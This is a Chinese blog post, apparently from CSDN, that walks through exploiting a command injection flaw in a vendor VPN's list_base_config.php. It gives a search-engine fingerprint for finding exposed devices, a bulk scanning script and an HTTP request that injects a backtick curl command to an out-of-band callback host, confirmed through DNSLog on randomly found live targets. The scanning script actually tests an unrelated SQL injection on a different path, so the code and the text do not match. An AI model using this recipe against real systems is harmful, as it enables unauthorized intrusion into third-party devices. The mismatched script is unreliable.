【漏洞复现】某某康达vpn list_base_config 远程命令执行漏洞

于 2024-08-17 02:00:00 发布
阅读量414 收藏 4
点赞数 9
分类专栏: 漏洞复现 文章标签: list 数据结构
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54799594/article/details/141256530
版权

           声明:本文档或演示材料仅用于教育和教学目的。如果任何个人或组织利用本文档中的信息进行非法活动,将与本文档的作者或发布者无关。

一、漏洞描述

网络设备是确保计算机网络顺畅运行的关键硬件组件,主要包括路由器、交换机、网桥、网卡、集线器、防火墙、调制解调器以及无线接入点等。其中,路由器主要负责在不同网络之间进行数据转发和地址转换;交换机则用于局域网内各设备的连接和数据交换;网桥的作用是连接不同网段,实现它们之间的通信;网卡则为计算机提供有线或无线网络接口。防火墙的主要职责是监控和控制网络流量,以维护网络的安全。然而,如果网络设备中的list_base_config.php接口存在命令执行漏洞,攻击者就可能利用这一漏洞获取系统权限。

二、资产收集

1.使用网络空间测绘引擎搜索

鹰图检索:web.body="/images/raisecom/back.gif"

2.使用poc批量扫描

import requests
import urllib3
from urllib.parse import urljoin, quote
import argparse
import ssl
import re

# 禁用SSL证书验证,忽略警告
ssl._create_default_https_context = ssl._create_unverified_context
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def read_file(file_path):
    """
    读取文件中的URL列表
    :param file_path: 文件路径
    :return: URL列表
    """
    with open(file_path, 'r') as file:
        urls = file.read().splitlines()
    return urls

def check(url):
    """
    检查目标URL是否存在SQL注入漏洞
    :param url: 目标URL
    :return: 如果存在漏洞,返回True
    """
    url = url.rstrip("/")
    target = urljoin(url, "/SystemManager/Api/TicketManager.ashx")
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
        "Content-Type": "application/x-www-form-urlencoded"
    }
    # 构造SQL注入数据包
    data = "Method=GetReServeOrder&solutionId=1' WAITFOR DELAY '0:0:5'--"
    try:
        response = requests.post(target, verify=False, headers=headers, timeout=25, data=data)
        # 判断响应状态码、响应内容以及响应时间是否符合预期
        if response.status_code == 200 and 'Table' in response.text and 5 < response.elapsed.total_seconds() < 10:
            print(f"\033[31mDiscovered:{url}: zckxTicketManager_SQLInject!\033[0m")
            return True
    except Exception as e:
        pass

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", help="URL")
    parser.add_argument("-f", "--txt", help="file")
    args = parser.parse_args()
    url = args.url
    txt = args.txt
    if url:
        check(url)
    elif txt:
        urls = read_file(txt)
        for url in urls:
            check(url)
    else:
        print("help")

cmd运行poc脚本:python poc.py -f host.txt

 随机寻找的幸运儿

三、漏洞复现 

1.构造数据包

1.构造数据包:

GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60curl%201111.7rzhzevp0iszj2p5s5186r25jwpndf14.oastify.com%60 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close

2.数据包分析 

  1. 这是一个HTTP GET请求的数据包,下面是对该数据包的解析:

  2. 请求行:GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60curl%201111.7rzhzevp0iszj2p5s5186r25jwpndf14.oastify.com%60 HTTP/1.1

    • GET: 表示这是一个HTTP GET请求。
    • /vpn/list_base_config.php: 请求的资源路径。
    • ?type=mod&parts=base_config&template=%60curl%201111.7rzhzevp0iszj2p5s5186r25jwpndf14.oastify.com%60: 查询参数,包括typepartstemplate等。
    • HTTP/1.1: HTTP协议版本。

  3. 请求头:

    • Host: x.x.x.x: 目标服务器的主机名或IP地址。
    • User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36: 客户端浏览器的信息。
    • Connection: close: 表示请求完成后关闭连接。

  4. 这个数据包是一个HTTP请求,用于获取位于http://x.x.x.x/vpn/list_base_config.php的资源,并传递了一些查询参数。

3.结束跑路

1.使用DNSLog.cn获取一个Domain

2.构造数据包,执行curl命令访问DNSLog生产的domain

3.DNSLog获取服务器的IP地址

每篇一言:纵使天光终将熄灭,我们也要歌颂太阳。

Cityミ slaves
关注
  • 9
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
张某某简历_嵌入式_java简历_程序员简历模板_计算机相关专业.doc
08-07
嵌入式_java简历_程序员简历模板_计算机相关专业 以下是从给定文件中生成的相关知识点: JavaEE相关知识点 * SpringMVC:JavaEE框架,用于构建Web应用程序 * MyBatis:Java持久层框架,用于数据库交互 ...
张某某简历_20201129154437_嵌入式_java简历_程序员简历模板_计算机相关专业.doc
08-07
张某某简历_20201129154437_嵌入式_java简历_程序员简历模板_计算机相关专业.doc
漏洞复现】某某康达vpn——list_base_config.php——命令执行
LongL_GuYu的博客
08-16 272
声明:本文档或演示材料仅供教育和教学目的使用,任何个人或组织使用本文档中的信息进行非法活动,均与本文档的作者或发布者无关。
探讨:web上存漏洞及原理分析、防范方法
01-21
常见互联网上面,我们也是经常听说,某某站点出现上存漏洞,某某开源项目有上存漏洞。 从互联网开始出现动态程序,上存漏洞像幽灵一样,频繁的出现在各种系统中。为什么,一个上存漏洞会这么频繁出现呢。而且,有些...
个人简历(谌某某)_嵌入式_java简历_程序员简历模板_计算机相关专业.docx
08-07
个人简历(谌某某)_嵌入式_java简历_程序员简历模板_计算机相关专业.docx 本资源是一份java开发工程师的个人简历,简历中展示了个人概况、工作经历、项目经验和技能等信息。以下是从中提取的知识点: 1. Java编程...
071_儿童手机小灵通商业计划书.doc
05-19
"某某有限责任公司"是一家专注于儿童手机研发和生产的科技企业,选址于福建软件园,秉持"科技完美生活、科技服务社会"的理念,以"创新、奉献、发展"为企业精神,追求经济效益与社会效益的双重提升。公司坚持"质量第...
【C++】list的模拟实现
2301_77954967的博客
08-16 954
在 C++ 编程中,模拟实现标准模板库(STL)中的list具有重要意义和广泛的应用场景。list作为一种常用的数据结构,其独特的特性使得在许多情况下能够提供高效和灵活的操作。模拟实现list有助于深入理解其内部工作原理。通过亲手编写代码来模拟 list 的各种功能,如节点的创建、插入、删除、遍历等,可以清晰地掌握数据在链表中的存储和流动方式,这对于提升对数据结构的理解和编程能力至关重要。在实际应用中,list 常用于需要频繁进行插入和删除操作的场景。
JAVA中的Iterator与ListIterator
qa3629723的博客
08-13 549
在上面的例子中,我们首先创建了一个List集合,并添加了四个元素。接下来,使用while循环和Iterator的hasNext()、next()方法遍历集合中的元素。Java中的Iterator类是Java集合框架中的一个重要接口,它用于遍历集合中的元素。Iterator是Java集合框架中非常重要的一个接口,它为遍历集合提供了统一的方法。在实际开发中,应根据具体需求选择合适的迭代器。在上面的例子中,我们使用ListIterator进行了正向和反向遍历,并在遍历过程中添加了一个新元素"葡萄"。
FSOP,glibc-2.23攻击IO_list_all
最新发布
yjh_fnu_ltn的博客
08-16 574
FSOP 是 File Stream Oriented Programming 的缩写,根据前面对 FILE 的介绍得知进程内所有的 _ IO_FILE 结构会使用 _ chain 域相互连接形成一个链表,这个链表的头部由_IO_list_all维护。FSOP 的核心思想就是劫持_IO_list_all 的值来伪造链表和其中的_IO_FILE 项,但是单纯的伪造只是构造了数据还需要某种方法进行触发。FSOP 选择的触发方法是调用_,这个函数会刷新_IO_list_all 链表中所有项的文件流,相当于。
笔记(day17)集合概述、List、Set、比较器
yanmoumou_的博客
08-12 777
​迭代器模式∶它可以使对于序列的底层数据结构的遍历行为与被遍历的对象分离,可以让我们无序关心底层数据结构直接的差异性,提供了统一遍历的标准.(无论底层为何种数据结构都可以使用这个标准进行遍历)LinkedList : 底层是一个双向链表,随机性添加和删除效率较高,查询和修改效率较低​ 底层是Haspmap,set其实就是map的key部分,因此不能做查询和修改操作Comparable 是“比较”的意思,而 Comparator 是“比较器”的意思;
Aria2@RPC下载@Alist批量下载
xuchaoxin1375的博客
08-15 495
Aria2 是一款轻量级、多协议、多源的命令行下载工具,其强大的功能使得它在开发者和高级用户中备受推崇。本文探讨 Aria2 的远程控制功能——RPC(Remote Procedure Call),并演示如何使用它来远程管理下载任务。添加、暂停、删除下载任务:可以通过 RPC 动态管理任务。获取任务状态:可以实时查询任务的下载进度、速度和状态。修改下载选项:支持在下载过程中修改下载参数,比如最大连接数、速度限制等。事件通知:可以通过 RPC 接口获取下载完成或出错的通知。
STL—list—模拟实现【迭代器的实现(重要)】【基本接口的实现】
aaa114514aaaa的博客
08-16 396
模拟实现了一个STL库中的list。【基本增删查改接口实现】【正向迭代器的实现】【反向迭代器的实现】,这里重要的迭代器的实现
ROS 2中,CMakeList.txt常见语法
Leo@Apas
08-16 342
在ROS 2中,CMakeList.txt 文件扮演着配置和管理构建过程的重要角色。这个文件遵循CMake的语法,用于定义如何编译和链接源代码。下面是一些在ROS 2项目CMakeList.txt文件中常见的语法和用法。
C++STL初阶(10):list的简易实现(下)
2301_79501467的博客
08-15 465
在上一文中我们完成了链表的多数基本接口,本文主要围绕构造函数进行补充。
Java链表LinkedList的基本概念、操作以及使用示例
逆风飞翔
08-16 248
除了了解 LinkedList 的使用方法,理解链表的基本原理和自己动手实现链表也是非常有益的学习过程。在 Java 中,链表是一种常见的数据结构,它由一系列节点组成,每个节点包含一个数据元素和指向下一个节点的引用。Java 提供了一些内置的链表实现,最常用的是 java.util.LinkedList 类。下面将详细介绍链表的基本概念、操作以及使用示例。LinkedList 是 Java 集合框架中提供的类,实现了 List 和 Deque 接口,因此它既可以作为列表使用,也可以作为双端队列使用。
list使用及底层模拟实现
a1937194471的博客
08-14 846
/指向存放字符串的空间,size_t _size;传一个const T过去不就行了,这样写其实是会报错的,这是因为迭代器的构造函数 iteratorlist(Node<T> *node):_node(node)这时候这个T类型实际上是const T,但是list当中begin和end传过来构造的节点可是T类型,举个例子list当中要求生成int类型的迭代器,可是迭代器当中是const int,这种没有什么权限缩小可以兼容使用,模版推演是严格遵守规则的(一点不同都生成不了),所以迭代器会生成失败。
JAVA中的ArrayDeque和LinkedList实现Deque,前者不能存NULL结点,后者可以存放NULL。
qq_52983535的博客
08-13 330
在刷力扣的时候,在进行二叉树的题目训练时,需要用队列来存储二叉树的结点。因为使用ArrayDeque实现Deque习惯了,所以默认使用ArrayDeque来实现Deque。但是在运行的时候,发现这个dq中无法存入null空结点,会报空指针异常。于是尝试了使用LinkedList来实现Deque。可以看到在ArrayDeque会对加入的值进行判断,如果为空就会报出异常,而LinkedList不会。具体原因我也不清楚。这样再将null空结点存入这个队列就不会报错了,我分别查看了一下两者的源码。
【C++】STL——list
m0_74091744的博客
08-16 594
list
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cityミ slaves

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值